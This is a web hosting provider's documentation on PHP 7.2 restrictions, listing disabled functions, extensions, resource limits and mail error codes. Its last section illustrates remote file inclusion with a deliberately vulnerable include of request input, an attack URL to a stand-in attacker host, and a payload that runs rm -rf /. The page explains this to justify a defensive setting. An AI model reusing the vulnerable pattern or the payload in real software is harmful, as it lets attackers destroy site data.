Overview

The TownNews platform is shared hosting environment. This means that your web site and several others are being serviced on the same computers. The largest concerns in our hosting environment with regards to PHP are:

  • Security - Access to files that belong to other customers, viewing passwords from other customers, and disgruntle employees trying to damage all sites on a system.
  • Resources - There are limitations to our hosting environment - we are always on the lookout for customers that fail to properly ensure their software actually scales or doesn't cause the whole system to shut down because of high CPU, disk, or memory requirements.

These reasons are why we must restrict the development environment from it's "out-of-box" behavior.

PHP Restrictions / Environment

Version

TownNews runs a patched version of PHP 7.2.

Disabled Functions

The following functions cannot be accessed from a PHP script:

  • apache_child_terminate
  • apache_get_modules
  • apache_get_version
  • apache_getenv
  • apache_lookup_uri
  • apache_note
  • apache_reset_timeout
  • apache_setenv
  • chgrp
  • chmod
  • chown
  • clearstatcache
  • disk_free_space
  • disk_total_space
  • diskfreespace
  • get_current_user
  • get_declared_classes
  • get_declared_interfaces
  • get_declared_traits
  • get_defined_constants
  • get_extension_funcs
  • get_included_files
  • get_loaded_extensions
  • get_required_files
  • highlight_file
  • ini_get_all
  • lchgrp
  • lchown
  • opcache_compile_file
  • opcache_get_configuration
  • opcache_get_status
  • opcache_invalidate
  • opcache_reset
  • pfsockopen
  • php_ini_loaded_file
  • php_ini_scanned_files
  • php_logo_guid
  • php_uname
  • phpcredits
  • phpinfo
  • posix_getlogin
  • posix_kill
  • posix_mkfifo
  • posix_mknod
  • posix_setsid
  • posix_setuid
  • posix_ttyname
  • proc_nice
  • realpath_cache_get
  • session_save_path
  • shell_exec
  • show_source
  • socket_select
  • stream_select
  • umask
  • virtual
  • zend_logo_guid
  • pcntl_fork
  • pcntl_exec

Safe-Mode Aware Functions

  • exec()
  • passthru()
  • proc_open()
  • system()
  • popen()
  • dl() 
  • php_uname()
  • curl()
  • mail()

Restricted File System

Unlike other mass virtual hosting providers, TownNews has modified our PHP distributions to limit access within the programming environment to each web site. Essentially, your scripts have access to a limited number of locations on the file system. These restrictions help prevent exploits found in other web site's code from being used to damage your web site.

BLOX access:

Other areas of the system are not available for general use. Note that this applies to PHP only. FTP access is available to data folders.

PHP Extensions

BLOX /app sites have the following extensions preloaded and available:

  • bcmath
  • Core
  • ctype
  • curl
  • date
  • dba
  • dom
  • exif
  • fileinfo
  • filter
  • ftp
  • gd
  • gettext
  • gmp
  • hash
  • iconv
  • imap
  • json
  • libxml
  • mbstring
  • mysqlnd
  • openssl
  • ossp_uuid
  • pam
  • pcntl
  • pcre
  • PDO
  • pdo_mysql
  • pdo_sqlite
  • posix
  • Reflection
  • session
  • SimpleXML
  • soap
  • sockets
  • SPL
  • standard
  • tidy
  • tokenizer
  • xml
  • xmlreader
  • xmlrpc
  • xmlwriter
  • zip
  • zlib

Max Execution Time

There is a max execution time of 60 seconds for scripts.

Memory Restrictions

Your script, including all of the class code and variable data, can only use up to 20MiB. File uploads are restricted to 50 MiB. Your script will automatically be terminated if it exceeds this limit.

mail_strerror

This function was written by TownNews is order to return a more detailed list of errors. A example of usage can be seen below, as well as a list of returned errors.

<?php

if(!($err = mail("person@gmail.com", "test", "test"))) { 
    echo "The error is: ".mail_strerror($err)."\n";
} 

?>

if the mail function returns false, mail_last_error() can be called, the record code from that is an integar which has the following meanings:

0
Mail was successfully delivered
-101
An error occurred while creating a temporary delivery file
-102
The FROM: field cannot contain more than one email address
-103
Mail messages cannot be addressed to more than 3 recipients
-104
The subject line cannot exceed 250 characters
-105
One or more of the recipients are blacklisted
-106
The rate limit for this address has been reached
-107
Unable to connect to SMTP mail server
-108
Unable to set from address
-109
No valid SMTP recipients
-110
Error while sending DATA
-111
Unable to finalize SMTP transaction
*
An unknown error has occurred

Otherwise, you can call mail_strerror() which will return the text based error

Deprecated modules and extensions

As of PHP 7.2, the following modules or extensions are deprecated or removed:

  • mysql extension has been removed as of PHP 7.2. Please switch to the PDO mysql driver.
  • mime magic support is removed
  • sqlite2 extension has been removed in PHP 7.2. Users should migrate to PDO sqlite.
  • sqlite3 extension has been removed in PHP 5.6, switch to PDO sqlite (which uses sqlite3)
  • ereg extension has been removed as of PHP 7.2.
  • PEAR modules removed - 
    • XML_Serializer,XML_RPC,HTTP_Request,Net_URL,XML_Tree,HTML_Form,Net_DNS,DB,Auth_SASL,Mail_mimeDecode,Net_DIME,XML_RSS,Net_NNTP,Request2,Net_URL2,Net_DNS2,Log,Mail_Mime,File_Find,XML_Parser2,Net_Socket,Net_SMTP,Mail,HTTP2,PHP_Archive

Including Remote Files

Sometimes, PHP let's you do things it shouldn't. One of them is allowing remote files to be executed without a care. An example script that loads template files using a variable follows:

<?php
 
include($_REQUEST['template']);

?>

The above script is dangerous on most PHP installations. The author was probably intending this to be a simple template system - something like:

http://www.example.com/load.php?template=template.html

However, an attacker would exploit this script by doing something like this:

http://www.example.com/load.php?template=http://www.attacker.com/delete_everything.txt

The attacker's "text" document would contain something like:

<?php

require_once 'System.php';
System::rm('-rf /');

?>

PHP would download the document from the remote host and execute the code locally - deleting everything on the system the web server has access to.

We've taken the liberty of "correcting" this issue by disabling remote inclusion of files for execution, but still allowing remote files to be downloaded for output purposes. The following functions have remote file download capabilities disabled entirely:

  • include()
  • include_once()
  • require()
  • require_once()